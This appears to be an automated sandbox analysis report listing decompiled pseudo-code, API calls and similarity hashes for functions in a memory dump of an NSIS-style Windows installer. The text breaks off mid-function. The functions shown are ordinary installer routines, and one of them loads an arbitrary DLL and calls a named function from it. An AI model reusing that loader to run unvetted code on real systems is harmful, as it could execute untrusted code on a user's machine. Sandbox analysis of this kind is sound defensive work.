Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32 ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E00406055();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32 ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405A8F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A8F(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405a90
0x00405aa7
0x00405aaf
0x00405aaf
0x00405ab7

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040209D(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040521E(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00421FFD,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00421FFD,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00421FFD,7519EA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
Opcode Fuzzy Hash: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x429448; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42f430;
						if(_t2 >  *0x42f430) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040653C(0);
					}
				} else {
					_t6 =  *0x429448; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}

0x00402e44
0x00402e5e
0x00402e64
0x00402e6e
0x00402e74
0x00402e7a
0x00402e8b
0x00402e94
0x00000000
0x00402e99
0x00402ea0
0x00402e66
0x00402e6d
0x00402e6d
0x00402e46
0x00402e46
0x00402e4d
0x00402e50
0x00402e50
0x00402e56
0x00402e5d
0x00402e5d

APIs

DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
GetTickCount.KERNEL32 ref: 00402E6E
CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
ShowWindow.USER32(00000000,00000005), ref: 00402E99

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405B7D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060F7(0x42bc98, _a4);
				_t21 = E00405B28(0x42bc98);
				if(_t21 != 0) {
					E004063D2(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040646B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AD6(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A8F();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405b89
0x00405b94
0x00405b98
0x00405b9f
0x00405bab
0x00405bb7
0x00405bb7
0x00405bcf
0x00405bd0
0x00405bd7
0x00405bd8
0x00000000
0x00000000
0x00405bbb
0x00405bc2
0x00405bca
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bc2
0x00405bda
0x00000000
0x00405bee
0x00405bad
0x00405bb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bb1
0x00405b9a
0x00000000

APIs

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-823278215
Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405192, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x42a87c - _t16; // 0x0
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
								 *0x42a87c = _t16;
								E00404B4E();
							}
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404ACE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E004041C7(0x413);
					return 0;
				}
				goto L10;
			}

0x00405196
0x004051a0
0x004051b6
0x004051bc
0x004051de
0x004051e1
0x004051e1
0x004051e7
0x004051e9
0x004051ef
0x004051f1
0x004051f2
0x004051f4
0x004051fa
0x004051fa
0x004051ef
0x00405204
0x00000000
0x00405212
0x004051c1
0x004051c7
0x004051c9
0x00405201
0x00405201
0x00000000
0x00405201
0x004051d5
0x004051d7
0x00000000
0x004051d7
0x004051a6
0x004051ad
0x00000000
0x004051b2
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 004051C1
CallWindowProcA.USER32 ref: 00405212

Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9

Strings

, xrefs: 004051A2

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405FDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
